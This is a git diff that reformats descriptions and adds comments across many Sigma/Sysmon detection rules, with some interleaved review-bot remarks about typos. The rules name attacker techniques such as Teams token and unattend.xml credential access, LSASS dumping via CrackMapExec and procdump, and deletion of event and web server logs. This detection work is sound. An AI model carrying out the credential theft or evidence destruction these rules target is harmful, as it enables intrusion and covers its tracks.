b/sigma/sysmon/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml index 2592f598e..cab9dde9b 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml 
+++ b/sigma/sysmon/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml @@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: QP's\*(58vaP!tF4 + CommandLine|contains: QP's\*(58vaP!tF4 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/file/file_change/file_change_win_2022_timestomping.yml b/sigma/sysmon/file/file_change/file_change_win_2022_timestomping.yml index 8089afceb..4bc9eaab9 100644 --- a/sigma/sysmon/file/file_change/file_change_win_2022_timestomping.yml +++ b/sigma/sysmon/file/file_change/file_change_win_2022_timestomping.yml @@ -1,13 +1,9 @@ title: File Creation Date Changed to Another Year id: 558eebe5-f2ba-4104-b339-36f7902bcc1a status: test -description: 'Attackers may change the file creation time of a backdoor to make it - look like it was installed with the operating system. - - Note that many processes legitimately change the creation time of a file; it does - not necessarily indicate malicious activity. - - ' +description: | + Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. + Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity. references: - https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html author: frack113, Florian Roth (Nextron Systems) 
@@ -33,20 +29,19 @@ detection: filter2: CreationUtcTime|startswith: '202' gen_filter_updates: - - Image: - - C:\Windows\system32\ProvTool.exe - - C:\Windows\System32\usocoreworker.exe - - C:\Windows\ImmersiveControlPanel\SystemSettings.exe - - TargetFilename|startswith: C:\ProgramData\USOPrivate\UpdateStore\ - - TargetFilename|endswith: - - .tmp - - .temp + - Image: + - C:\Windows\system32\ProvTool.exe + - C:\Windows\System32\usocoreworker.exe + - C:\Windows\ImmersiveControlPanel\SystemSettings.exe + - TargetFilename|startswith: C:\ProgramData\USOPrivate\UpdateStore\ + - TargetFilename|endswith: + - .tmp + - .temp gen_filter_tiworker: Image|startswith: C:\WINDOWS\ Image|endswith: \TiWorker.exe TargetFilename|endswith: .cab - condition: file_change and ((( selection1 and not filter1 ) or ( selection2 and - not filter2 )) and not 1 of gen_filter*) + condition: file_change and ((( selection1 and not filter1 ) or ( selection2 and not filter2 )) and not 1 of gen_filter*) falsepositives: - Changes made to or by the local NTP service level: high diff --git a/sigma/sysmon/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml b/sigma/sysmon/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml index 2c5f304b7..869c3b374 100644 --- a/sigma/sysmon/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml +++ b/sigma/sysmon/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml 
@@ -1,12 +1,10 @@ title: Unusual File Modification by dns.exe id: 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3 related: - - id: 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0 - type: similar + - id: 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0 # FileDelete version + type: similar status: test -description: Detects an unexpected file being modified by dns.exe which my indicate - activity related to remote code execution or other forms of exploitation as seen - in CVE-2020-1350 (SigRed) +description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) references: - https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html author: Tim Rauch (Nextron Systems) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml b/sigma/sysmon/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml index 5a1aea18d..386721b4a 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml @@ -1,8 +1,7 @@ title: Potential PrintNightmare Exploitation Attempt id: 5b2bbc47-dead-4ef7-8908-0cf73fcbecbf status: test -description: Detect DLL deletions from Spooler Service driver folder. This might be - a potential exploitation attempt of CVE-2021-1675 +description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 references: - https://github.com/hhlxf/PrintNightmare - https://github.com/cube0x0/CVE-2021-1675 diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_backup_file.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_backup_file.yml index 4e4ba0343..e38827a78 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_backup_file.yml 
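Review bot: The reflowed description on the new side still carries the typo "which my indicate"; since the line is rewritten anyway it should read `description: Detects an unexpected file being modified by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)`. The sibling FileDelete rule (file_delete_win_unusual_deletion_by_dns_exe.yml, further down in this patch) reflows the same sentence with the same typo, so both descriptions should be corrected together to keep the two related rules consistent.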
+++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_backup_file.yml @@ -1,9 +1,7 @@ title: Backup Files Deleted id: 06125661-3814-4e03-bfa2-1e4411c60ac3 status: test -description: Detects deletion of files with extensions often used for backup files. - Adversaries may delete or remove built-in operating system data and turn off services - designed to aid in the recovery of a corrupted system to prevent recovery. +description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files author: frack113 diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_event_log_files.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_event_log_files.yml index 374ef2852..1cc83f0ef 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_event_log_files.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_event_log_files.yml @@ -1,8 +1,7 @@ title: EventLog EVTX File Deleted id: 63c779ba-f638-40a0-a593-ddd45e8b1ddc status: test -description: Detects the deletion of the event log files which may indicate an attempt - to destroy forensic evidence +description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml index 53d46006c..2b5c4cf87 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml 
+++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml @@ -1,8 +1,7 @@ title: Exchange PowerShell Cmdlet History Deleted id: a55349d8-9588-4c5a-8e3b-1925fe2a4ffe status: test -description: Detects the deletion of the Exchange PowerShell cmdlet History logs which - may indicate an attempt to destroy forensic evidence +description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence references: - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_iis_access_logs.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_iis_access_logs.yml index a0e793454..feede199b 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_iis_access_logs.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_iis_access_logs.yml @@ -1,8 +1,7 @@ title: IIS WebServer Access Logs Deleted id: 3eb8c339-a765-48cc-a150-4364c04652bf status: test -description: Detects the deletion of IIS WebServer access logs which may indicate - an attempt to destroy forensic evidence +description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence references: - https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_powershell_command_history.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_powershell_command_history.yml index fc269ed34..07f4633b0 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_powershell_command_history.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_powershell_command_history.yml 
@@ -1,8 +1,7 @@ title: PowerShell Console History Logs Deleted id: ff301988-c231-4bd0-834c-ac9d73b86586 status: test -description: Detects the deletion of the PowerShell console History logs which may - indicate an attempt to destroy forensic evidence +description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_prefetch.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_prefetch.yml index 9fdf88a24..7083dcfca 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_prefetch.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_prefetch.yml @@ -1,8 +1,7 @@ title: Prefetch File Deleted id: 0a1f9d29-6465-4776-b091-7f43b26e4c89 status: test -description: Detects the deletion of a prefetch file which may indicate an attempt - to destroy forensic evidence +description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence author: Cedric MAURUGEON date: 2021/09/29 modified: 2023/02/15 @@ -24,7 +23,7 @@ detection: TargetFilename|endswith: .pf filter: Image: C:\windows\system32\svchost.exe - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: file_delete and (selection and not filter) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_teamviewer_logs.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_teamviewer_logs.yml index e3abee022..cef680c2d 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_teamviewer_logs.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_teamviewer_logs.yml 
@@ -1,8 +1,7 @@ title: TeamViewer Log File Deleted id: b1decb61-ed83-4339-8e95-53ea51901720 status: test -description: Detects the deletion of the TeamViewer log files which may indicate an - attempt to destroy forensic evidence +description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md author: frack113 diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_tomcat_logs.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_tomcat_logs.yml index c917c0c27..256bdea17 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_tomcat_logs.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_tomcat_logs.yml @@ -1,8 +1,7 @@ title: Tomcat WebServer Logs Deleted id: 270185ff-5f50-4d6d-a27f-24c3b8c9fef8 status: test -description: Detects the deletion of tomcat WebServer logs which may indicate an attempt - to destroy forensic evidence +description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence references: - Internal Research - https://linuxhint.com/view-tomcat-logs-windows/ diff --git a/sigma/sysmon/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/sigma/sysmon/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index 6c00954c2..78abfde9b 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml 
@@ -1,8 +1,7 @@ title: File Deleted Via Sysinternals SDelete id: 6ddab845-b1b8-49c2-bbf7-1a11967f64bc status: test -description: Detects the deletion of files by the Sysinternals SDelete utility. It - looks for the common name pattern used to rename files. +description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md diff --git a/sigma/sysmon/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml b/sigma/sysmon/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml index 694819e1a..2c46f02ea 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml @@ -1,12 +1,10 @@ title: Unusual File Deletion by Dns.exe id: 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0 related: - - id: 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3 - type: similar + - id: 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3 # FileChange version + type: similar status: test -description: Detects an unexpected file being deleted by dns.exe which my indicate - activity related to remote code execution or other forms of exploitation as seen - in CVE-2020-1350 (SigRed) +description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) references: - https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html author: Tim Rauch (Nextron Systems) 
diff --git a/sigma/sysmon/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml b/sigma/sysmon/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml index b7d3d8598..10d70bf3c 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml @@ -1,12 +1,10 @@ title: ADS Zone.Identifier Deleted By Uncommon Application id: 3109530e-ab47-4cc6-a953-cac5ebcc93ae related: - - id: 7eac0a16-5832-4e81-865f-0268a6d19e4b - type: similar + - id: 7eac0a16-5832-4e81-865f-0268a6d19e4b + type: similar status: experimental -description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. - Attackers can leverage this in order to bypass security restrictions that make - use of the ADS such as Microsoft Office apps. +description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. references: - https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/ - Internal Research @@ -29,6 +27,7 @@ detection: selection: TargetFilename|endswith: :Zone.Identifier filter_main_generic: + # Note: in some envs this activity might be performed by other software. Apply additional filters as necessary Image|endswith: - :\Program Files\PowerShell\7-preview\pwsh.exe - :\Program Files\PowerShell\7\pwsh.exe diff --git a/sigma/sysmon/file/file_event/file_event_win_access_susp_teams.yml b/sigma/sysmon/file/file_event/file_event_win_access_susp_teams.yml index c829a066f..b81e1a05b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_access_susp_teams.yml +++ b/sigma/sysmon/file/file_event/file_event_win_access_susp_teams.yml 
@@ -1,8 +1,7 @@ title: Suspicious File Event With Teams Objects id: 6902955a-01b7-432c-b32a-6f5f81d8f624 status: test -description: Detects an access to authentication tokens and accounts of Microsoft - Teams desktop application. +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. references: - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens diff --git a/sigma/sysmon/file/file_event/file_event_win_access_susp_unattend_xml.yml b/sigma/sysmon/file/file_event/file_event_win_access_susp_unattend_xml.yml index 760c79eaf..8a189d5db 100644 --- a/sigma/sysmon/file/file_event/file_event_win_access_susp_unattend_xml.yml +++ b/sigma/sysmon/file/file_event/file_event_win_access_susp_unattend_xml.yml @@ -1,13 +1,9 @@ title: Suspicious Unattend.xml File Access id: 1a3d42dd-3763-46b9-8025-b5f17f340dfb status: test -description: 'Attempts to access unattend.xml, where credentials are commonly stored, - within the Panther directory where installation logs are stored. - - If these files exist, their contents will be displayed. They are used to store - credentials/answers during the unattended windows install process - - ' +description: | + Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. + If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md author: frack113 
diff --git a/sigma/sysmon/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml b/sigma/sysmon/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml index 16e0a4bfb..08c27c272 100644 --- a/sigma/sysmon/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml +++ b/sigma/sysmon/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml @@ -1,8 +1,7 @@ title: ADSI-Cache File Creation By Uncommon Tool id: 75bf09fa-1dd7-4d18-9af9-dd9e492562eb status: test -description: Detects the creation of an "Active Directory Schema Cache File" (.sch) - file by an uncommon tool. +description: Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool. references: - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961 - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/ 
@@ -25,19 +24,19 @@ detection: TargetFilename|contains: \Local\Microsoft\Windows\SchCache\ TargetFilename|endswith: .sch filter_main_generic: - - Image|endswith: - - :\Program Files\Cylance\Desktop\CylanceSvc.exe - - :\Windows\CCM\CcmExec.exe - - :\windows\system32\dllhost.exe - - :\Windows\system32\dsac.exe - - :\Windows\system32\efsui.exe - - :\windows\system32\mmc.exe - - :\windows\system32\svchost.exe - - :\Windows\System32\wbem\WmiPrvSE.exe - - :\windows\system32\WindowsPowerShell\v1.0\powershell.exe - - Image|contains: - - :\Windows\ccmsetup\autoupgrade\ccmsetup - - :\Program Files\SentinelOne\Sentinel Agent + - Image|endswith: + - :\Program Files\Cylance\Desktop\CylanceSvc.exe + - :\Windows\CCM\CcmExec.exe + - :\windows\system32\dllhost.exe + - :\Windows\system32\dsac.exe + - :\Windows\system32\efsui.exe + - :\windows\system32\mmc.exe + - :\windows\system32\svchost.exe + - :\Windows\System32\wbem\WmiPrvSE.exe + - :\windows\system32\WindowsPowerShell\v1.0\powershell.exe + - Image|contains: + - :\Windows\ccmsetup\autoupgrade\ccmsetup # C:\Windows\ccmsetup\autoupgrade\ccmsetup.TMC00002.40.exe + - :\Program Files\SentinelOne\Sentinel Agent # C:\Program Files\SentinelOne\Sentinel Agent 21.7.7.40005\SentinelAgent.exe filter_main_office: Image|contains|all: - :\Program Files\ 
@@ -46,10 +45,11 @@ detection: filter_optional_ldapwhoami: Image|endswith: \LANDesk\LDCLient\ldapwhoami.exe filter_optional_citrix: + # Example: + # TargetFilename=C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\SchCache\REDACTED.com.sch Image|endswith: :\Program Files\Citrix\Receiver StoreFront\Services\DefaultDomainServices\Citrix.DeliveryServices.DomainServices.ServiceHost.exe condition: file_event and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity - by MMC, Powershell, Windows etc. + - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc. level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_advanced_ip_scanner.yml b/sigma/sysmon/file/file_event/file_event_win_advanced_ip_scanner.yml index d7683c46c..b4b605872 100644 --- a/sigma/sysmon/file/file_event/file_event_win_advanced_ip_scanner.yml +++ b/sigma/sysmon/file/file_event/file_event_win_advanced_ip_scanner.yml @@ -1,11 +1,10 @@ title: Advanced IP Scanner - File Event id: fed85bf9-e075-4280-9159-fbe8a023d6fa related: - - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f - type: derived + - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f + type: derived status: test -description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for - ransomware groups. +description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. references: - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html 
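Review bot: The falsepositives entry rewritten on the new side keeps the misspelling "legimate"; it should read `- Other legitimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.`. The `# Example:` comment added to filter_optional_citrix shows a TargetFilename, while the filter itself matches on Image, so a short lead-in such as `# Example of an event this filter suppresses (match is on Image, not TargetFilename):` would make clear which field the sample illustrates.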
diff --git a/sigma/sysmon/file/file_event/file_event_win_anydesk_artefact.yml b/sigma/sysmon/file/file_event/file_event_win_anydesk_artefact.yml index 1a3a12921..c94566776 100644 --- a/sigma/sysmon/file/file_event/file_event_win_anydesk_artefact.yml +++ b/sigma/sysmon/file/file_event/file_event_win_anydesk_artefact.yml @@ -1,18 +1,10 @@ title: Anydesk Temporary Artefact id: 0b9ad457-2554-44c1-82c2-d56a99c42377 status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows author: frack113 
diff --git a/sigma/sysmon/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml b/sigma/sysmon/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml index 63e6d00cc..26ec23d73 100644 --- a/sigma/sysmon/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml +++ b/sigma/sysmon/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml @@ -1,15 +1,10 @@ title: Suspicious Binary Writes Via AnyDesk id: 2d367498-5112-4ae5-a06a-96e7bc33a211 status: test -description: 'Detects AnyDesk writing binary files to disk other than "gcapi.dll". - - According to RedCanary research it is highly abnormal for AnyDesk to write executable - files to disk besides gcapi.dll, - - which is a legitimate DLL that is part of the Google Chrome web browser used to - interact with the Google Cloud API. (See reference section for more details) - - ' +description: | + Detects AnyDesk writing binary files to disk other than "gcapi.dll". + According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, + which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details) references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_aspnet_temp_files.yml b/sigma/sysmon/file/file_event/file_event_win_aspnet_temp_files.yml index 958d07603..a2f1583e8 100644 --- a/sigma/sysmon/file/file_event/file_event_win_aspnet_temp_files.yml +++ b/sigma/sysmon/file/file_event/file_event_win_aspnet_temp_files.yml 
@@ -1,18 +1,15 @@ title: Assembly DLL Creation Via AspNetCompiler -id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 +id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File related: - - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 - type: similar - - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 - type: similar - - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 - type: similar + - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild + type: similar + - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths + type: similar + - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec + type: similar status: experimental -description: 'Detects the creation of new DLL assembly files by "aspnet_compiler.exe", - which could be a sign of "aspnet_compiler" abuse to proxy execution through a - build provider. - - ' +description: | + Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_bloodhound_collection.yml b/sigma/sysmon/file/file_event/file_event_win_bloodhound_collection.yml index 644cc9c9b..06573a5db 100644 --- a/sigma/sysmon/file/file_event/file_event_win_bloodhound_collection.yml +++ b/sigma/sysmon/file/file_event/file_event_win_bloodhound_collection.yml @@ -1,8 +1,7 @@ title: BloodHound Collection Files id: 02773bed-83bf-469f-b7ff-e676e7d78bab status: experimental -description: Detects default file names outputted by the BloodHound collection tool - SharpHound +description: Detects default file names outputted by the BloodHound collection tool SharpHound references: - https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection author: C.J. May 
@@ -41,7 +40,6 @@ detection: TargetFilename|endswith: \pocket_containers.json condition: file_event and (selection and not 1 of filter_optional_*) falsepositives: - - Some false positives may arise in some environment and this may require some - tuning. Add additional filters or reduce level depending on the level of noise + - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_crackmapexec_patterns.yml b/sigma/sysmon/file/file_event/file_event_win_crackmapexec_patterns.yml index 29c25bd77..1be047a13 100644 --- a/sigma/sysmon/file/file_event/file_event_win_crackmapexec_patterns.yml +++ b/sigma/sysmon/file/file_event/file_event_win_crackmapexec_patterns.yml @@ -1,8 +1,7 @@ title: CrackMapExec File Creation Patterns id: 9433ff9c-5d3f-4269-99f8-95fc826ea489 status: test -description: Detects suspicious file creation patterns found in logs when CrackMapExec - is used +description: Detects suspicious file creation patterns found in logs when CrackMapExec is used references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass author: Florian Roth (Nextron Systems) @@ -22,7 +21,7 @@ detection: selection_lsass_dump1: TargetFilename|startswith: C:\Windows\Temp\ Image: C:\WINDOWS\system32\rundll32.exe - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI TargetFilename|endswith: @@ -51,9 +50,10 @@ detection: - .drv - .cur - .tmp + # list is incomplete selection_procdump: TargetFilename: C:\Windows\Temp\procdump.exe - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: file_event and (1 of selection*) 
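Review bot: The added `# list is incomplete` comment sits at the end of an extension list and immediately before selection_procdump, with no indication of which list it refers to or what is missing, so a reader may attach it to the wrong block. Either move it next to the `TargetFilename|endswith:` key it appears to describe or spell it out, e.g. `# Note: extension list is not exhaustive; extend it with other extensions observed in your environment`. The enclosing selection block starts outside this hunk.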
diff --git a/sigma/sysmon/file/file_event/file_event_win_create_evtx_non_common_locations.yml b/sigma/sysmon/file/file_event/file_event_win_create_evtx_non_common_locations.yml index ac7036ac6..c58af9f6b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_create_evtx_non_common_locations.yml +++ b/sigma/sysmon/file/file_event/file_event_win_create_evtx_non_common_locations.yml @@ -1,9 +1,7 @@ title: EVTX Created In Uncommon Location id: 65236ec7-ace0-4f0c-82fd-737b04fd4dcb status: experimental -description: Detects the creation of new files with the ".evtx" extension in non-common - locations. Which could indicate tampering with default evtx locations in order - to evade security controls +description: Detects the creation of new files with the ".evtx" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls references: - https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key author: D3F7A5105 @@ -16,8 +14,7 @@ tags: logsource: category: file_event product: windows - definition: 'Requirements: The ".evtx" extension should be monitored via a Sysmon - configuration. Example: .evtx' + definition: 'Requirements: The ".evtx" extension should be monitored via a Sysmon configuration. Example: .evtx' detection: file_event: EventID: 11 diff --git a/sigma/sysmon/file/file_event/file_event_win_create_non_existent_dlls.yml b/sigma/sysmon/file/file_event/file_event_win_create_non_existent_dlls.yml index 0a8d613f8..e15f11a6c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_create_non_existent_dlls.yml +++ b/sigma/sysmon/file/file_event/file_event_win_create_non_existent_dlls.yml 
@@ -1,15 +1,12 @@ title: Creation Of Non-Existent System DLL id: df6ecb8b-7822-4f4b-b412-08f524b4576c related: - - id: 6b98b92b-4f00-4f62-b4fe-4d1920215771 - type: similar + - id: 6b98b92b-4f00-4f62-b4fe-4d1920215771 # ImageLoad rule + type: similar status: test -description: 'Detects the creation of system DLLs that are usually not present on - the system (or at least not in system directories). - +description: | + Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking. - - ' references: - https://decoded.avast.io/martinchlumecky/png-steganography/ - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 diff --git a/sigma/sysmon/file/file_event/file_event_win_creation_new_shim_database.yml b/sigma/sysmon/file/file_event/file_event_win_creation_new_shim_database.yml index 3e19f406d..b27320a49 100644 --- a/sigma/sysmon/file/file_event/file_event_win_creation_new_shim_database.yml +++ b/sigma/sysmon/file/file_event/file_event_win_creation_new_shim_database.yml 
